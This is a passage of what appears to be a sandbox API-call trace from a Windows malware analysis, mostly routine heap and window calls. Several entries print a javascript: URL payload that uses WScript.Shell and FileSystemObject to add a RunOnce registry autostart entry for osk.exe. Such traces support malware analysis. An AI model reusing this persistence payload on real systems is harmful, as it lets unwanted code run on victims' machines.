() returned 0x544 [0075.632] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.632] GetCurrentThreadId () returned 0x544 [0075.632] GetCurrentThreadId () returned 0x544 [0075.632] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x7b1450, Size=0x6c) returned 0x7a2aa0 [0075.633] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.633] GetCapture () returned 0x0 [0075.633] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.633] GetCurrentThreadId () returned 0x544 [0075.633] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.633] GetCurrentThreadId () returned 0x544 [0075.633] GetCurrentThreadId () returned 0x544 [0075.633] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.634] GetCapture () returned 0x0 [0075.634] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.634] GetCurrentThreadId () returned 0x544 [0075.634] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.634] GetCurrentThreadId () returned 0x544 [0075.634] GetCurrentThreadId () returned 0x544 [0075.634] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.635] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.635] GetCurrentThreadId () returned 0x544 [0075.635] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.635] GetCurrentThreadId () returned 0x544 [0075.635] GetCurrentThreadId () returned 0x544 [0075.635] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.635] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.636] GetCurrentThreadId () returned 0x544 [0075.636] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | 
out: hHeap=0x760000) returned 1 [0075.636] GetCurrentThreadId () returned 0x544 [0075.636] GetCurrentThreadId () returned 0x544 [0075.636] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x7a2aa0, Size=0x9c) returned 0x7a2aa0 [0075.636] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a93a8 | out: hHeap=0x760000) returned 1 [0075.636] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b2d38 | out: hHeap=0x760000) returned 1 [0075.636] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a9378 | out: hHeap=0x760000) returned 1 [0075.636] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b2d48 | out: hHeap=0x760000) returned 1 [0075.636] GetCurrentThreadId () returned 0x544 [0075.636] GetFocus () returned 0x302a0 [0075.636] GetFocus () returned 0x302a0 [0075.636] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppu=0x33f5f0 | out: ppu=0x33f5f0) returned 0x0 [0075.784] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0075.784] IUri:GetAbsoluteUri (in: This=0x78c78c, pbstrAbsoluteUri=0x33f670 | out: pbstrAbsoluteUri=0x33f670*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0075.784] IUnknown:Release (This=0x78c78c) returned 0x3 [0075.784] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0075.784] ShouldShowIntranetWarningSecband () returned 0x0 [0075.961] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ef14 | out: ppv=0x33ef14*=0x75028d20) returned 0x0 [0075.961] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33f000 | out: ppvObject=0x33f000*=0x75028d2c) returned 0x0 [0075.961] IUnknown:Release (This=0x75028d20) returned 0x1 [0075.961] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x7a5340, cchResult=0xfe, pcchResult=0x33f048, dwReserved=0x0 | out: pwzResult="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pcchResult=0x33f048*=0xfe) returned 0x0 [0075.961] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a5b60 [0075.961] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a5b60 | out: hHeap=0x760000) returned 1 [0075.961] IUnknown:Release (This=0x75028d2c) returned 0x1 [0075.962] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ef14 | out: ppv=0x33ef14*=0x75028d20) returned 0x0 [0075.962] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, 
Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33f000 | out: ppvObject=0x33f000*=0x75028d2c) returned 0x0 [0075.962] IUnknown:Release (This=0x75028d20) returned 0x1 [0075.962] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x7a5340, cchResult=0xfe, pcchResult=0x33f058, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33f058*=0x0) returned 0x800c0011 [0075.962] IUnknown:Release (This=0x75028d2c) returned 0x1 [0075.962] GetIUriPriv () returned 0x0 [0075.962] IUnknown:Release (This=0x78c78c) returned 0x3 [0075.962] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f468 | out: lpPoint=0x33f468) returned 1 [0075.963] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.963] GetCurrentThreadId () returned 0x544 [0075.963] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.963] GetCurrentThreadId () returned 0x544 [0075.963] GetCurrentThreadId () returned 0x544 [0075.963] GetFocus () returned 0x302a0 [0075.963] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f5d8 | out: lpPoint=0x33f5d8) returned 1 [0075.963] GetClientRect (in: hWnd=0x302a0, lpRect=0x33f5c8 | out: lpRect=0x33f5c8) returned 1 [0075.963] LoadStringW (in: hInstance=0x73710000, uID=0x1fe9, lpBuffer=0x33f260, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0075.963] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a5750 | out: hHeap=0x760000) returned 1 [0075.963] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7cd1e8 | out: hHeap=0x760000) returned 1 [0075.964] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0075.964] IUri:GetScheme (in: This=0x78c78c, 
pdwScheme=0x33e6ec | out: pdwScheme=0x33e6ec*=0xf) returned 0x0 [0075.964] IUri:GetDisplayUri (in: This=0x78c78c, pbstrDisplayString=0x33e6f8 | out: pbstrDisplayString=0x33e6f8*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0075.964] GetWindowTextW (in: hWnd=0x3027a, lpString=0x33e298, nMaxCount=512 | out: lpString="") returned 0 [0075.964] NtdllDefWindowProc_W () returned 0x0 [0075.964] SetWindowTextW (hWnd=0x3027a, lpString="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 1 [0075.964] NtdllDefWindowProc_W () returned 0x1 [0075.964] IUnknown:Release (This=0x78c78c) returned 0x3 [0075.964] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0075.965] SendMessageW (hWnd=0x6011a, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0075.965] NtdllDefWindowProc_W () returned 0x0 [0075.965] NtdllDefWindowProc_W () returned 0x0 [0075.966] NtdllDefWindowProc_W () returned 0x0 [0075.966] SendMessageW (hWnd=0x3027a, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0075.966] NtdllDefWindowProc_W () returned 0x0 [0075.966] SetWindowLongW (hWnd=0x3027a, nIndex=-16, dwNewLong=-2100363264) returned -2033254400 [0075.966] NtdllDefWindowProc_W () returned 0x0 [0075.966] NtdllDefWindowProc_W () returned 0x0 [0076.638] NtdllDefWindowProc_W () returned 0x10027 [0076.638] SetWindowLongW (hWnd=0x3027a, nIndex=-20, dwNewLong=262144) returned 262400 [0076.638] NtdllDefWindowProc_W () returned 0x0 [0076.638] NtdllDefWindowProc_W () returned 0x0 [0076.639] SetWindowPos (hWnd=0x3027a, hWndInsertAfter=0xfffffffe, X=0, 
Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0076.639] NtdllDefWindowProc_W () returned 0x0 [0076.639] NtdllDefWindowProc_W () returned 0x0 [0076.640] NtdllDefWindowProc_W () returned 0x0 [0076.640] GlobalAddAtomW (lpString=0x0) returned 0x0 [0076.640] SetPropW (hWnd=0x6011a, lpString=0x0, hData=0x6011a) returned 0 [0076.640] ShowWindow (hWnd=0x3027a, nCmdShow=0) returned 0 [0076.640] UpdateWindow (hWnd=0x3027a) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.641] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.641] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.641] GetCurrentThreadId () returned 0x544 [0076.641] GetCurrentThreadId () returned 0x544 [0076.641] GetCurrentThreadId () returned 0x544 [0077.054] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33efd0 | out: lpPoint=0x33efd0) returned 1 [0077.054] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.054] GetCurrentThreadId () returned 0x544 [0077.055] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.055] GetCurrentThreadId () returned 0x544 [0077.055] GetFocus () returned 0x302a0 [0077.055] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x50) returned 0x7a3338 [0077.055] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0077.055] ScreenToClient (in: 
hWnd=0x302a0, lpPoint=0x33f000 | out: lpPoint=0x33f000) returned 1 [0077.055] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.055] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.056] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33efe8 | out: lpPoint=0x33efe8) returned 1 [0077.056] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.056] GetCurrentThreadId () returned 0x544 [0077.056] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.056] GetCurrentThreadId () returned 0x544 [0077.056] IsWinEventHookInstalled (event=0x8005) returned 0 [0077.056] StrCmpICW (pszStr1="about:blank", pszStr2="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned -9 [0077.056] StrCmpICW (pszStr1="about:blank", pszStr2="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned -9 [0077.056] GetCurrentThreadId () returned 0x544 [0077.056] GetCurrentThreadId () returned 0x544 [0077.056] GetCurrentThreadId () returned 0x544 [0077.056] GetCurrentThreadId () returned 0x544 [0077.057] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f528 | out: lpPoint=0x33f528) returned 1 [0077.057] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.057] GetCurrentThreadId () returned 0x544 [0077.057] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.057] GetCurrentThreadId () returned 0x544 [0077.057] GetCurrentThreadId () returned 0x544 
[0077.057] GetFocus () returned 0x302a0 [0077.057] GetCurrentThreadId () returned 0x544 [0077.057] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f4e8 | out: lpPoint=0x33f4e8) returned 1 [0077.057] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.058] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.058] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f4c8 | out: lpPoint=0x33f4c8) returned 1 [0077.058] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.058] GetCurrentThreadId () returned 0x544 [0077.058] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.058] GetCurrentThreadId () returned 0x544 [0077.058] IsWinEventHookInstalled (event=0x8005) returned 0 [0077.058] GetCurrentThreadId () returned 0x544 [0077.058] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.058] NtdllDefWindowProc_W () returned 0x1 [0077.061] NtdllDefWindowProc_W () returned 0x0 [0077.061] NtdllDefWindowProc_W () returned 0x0 [0077.061] NtdllDefWindowProc_W () returned 0x0 [0077.061] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.061] GetParent (hWnd=0x302a0) returned 0x3027a [0077.061] GetParent (hWnd=0x3027a) returned 0x6011a [0077.061] GetParent (hWnd=0x6011a) returned 0x0 [0077.061] PostMessageW (hWnd=0x302a0, Msg=0x491, wParam=0x0, lParam=0x0) returned 1 [0077.062] GetMessageTime () returned 124769 [0077.062] GetMessagePos () returned 0x35603df [0077.062] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f280 | out: lpPoint=0x33f280) returned 1 [0077.062] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f280 | out: lpPoint=0x33f280) returned 1 [0077.062] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.062] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9378 [0077.063] GetCurrentThreadId () 
returned 0x544 [0077.063] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.063] GetCurrentThreadId () returned 0x544 [0077.063] GetCurrentThreadId () returned 0x544 [0077.063] PostMessageW (hWnd=0x20280, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0077.063] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a9378 | out: hHeap=0x760000) returned 1 [0077.063] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x33f4bc | out: plResult=0x33f4bc) returned 0x1 [0077.063] NtdllDefWindowProc_W () returned 0x0 [0077.063] GetCurrentThreadId () returned 0x544 [0077.063] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.064] GetMessageTime () returned 124769 [0077.064] GetMessagePos () returned 0x35603df [0077.064] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x33f0cc | out: plResult=0x33f0cc) returned 0x0 [0077.064] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.064] GetMessageTime () returned 124769 [0077.064] GetMessagePos () returned 0x35603df [0077.064] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xf8) returned 0x7cb770 [0077.065] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x33eafc | out: plResult=0x33eafc) returned 0x0 [0077.065] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7cb770 | out: hHeap=0x760000) returned 1 [0077.065] GetCurrentThreadId () returned 0x544 [0077.065] GetCurrentThreadId () returned 0x544 [0077.065] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.065] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.065] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.065] GetAncestor (hwnd=0x302a0, gaFlags=0x2) returned 0x3027a [0077.065] IsIconic (hWnd=0x3027a) returned 0 [0077.065] 
GetCurrentThreadId () returned 0x544 [0077.065] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.065] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.065] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.065] GetFocus () returned 0x0 [0077.065] EnumChildWindows (hWndParent=0x302a0, lpEnumFunc=0x74e10a73, lParam=0x33f4ec) returned 0 [0077.065] GetCurrentThreadId () returned 0x544 [0077.066] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f4e8 | out: lpPoint=0x33f4e8) returned 1 [0077.066] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.066] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.066] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f4c8 | out: lpPoint=0x33f4c8) returned 1 [0077.066] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.066] GetCurrentThreadId () returned 0x544 [0077.066] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.067] GetCurrentThreadId () returned 0x544 [0077.067] IsWinEventHookInstalled (event=0x8005) returned 0 [0077.067] GetCurrentThreadId () returned 0x544 [0077.067] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.067] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.067] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.067] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.067] KillTimer (hWnd=0x302a0, uIDEvent=0x1000) returned 1 [0077.067] GetCurrentThreadId () returned 0x544 [0077.067] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.067] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.067] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.067] KillTimer (hWnd=0x20280, uIDEvent=0x2000) returned 1 [0077.067] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.067] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.068] IUnknown:Release (This=0x787518) returned 0x1 [0077.068] GetCurrentThreadId () returned 0x544 [0077.068] GetCurrentThreadId () returned 0x544 [0077.068] GetCurrentThreadId () returned 0x544 [0077.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.071] IsCharSpaceW (wch=0x69) returned 0 [0077.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.071] IsCharSpaceW (wch=0x69) returned 0 [0077.072] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.072] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.072] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, 
cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.072] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.072] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.072] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.072] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.072] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.072] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.073] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1 [0077.073] 
FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.073] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2 [0077.073] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: 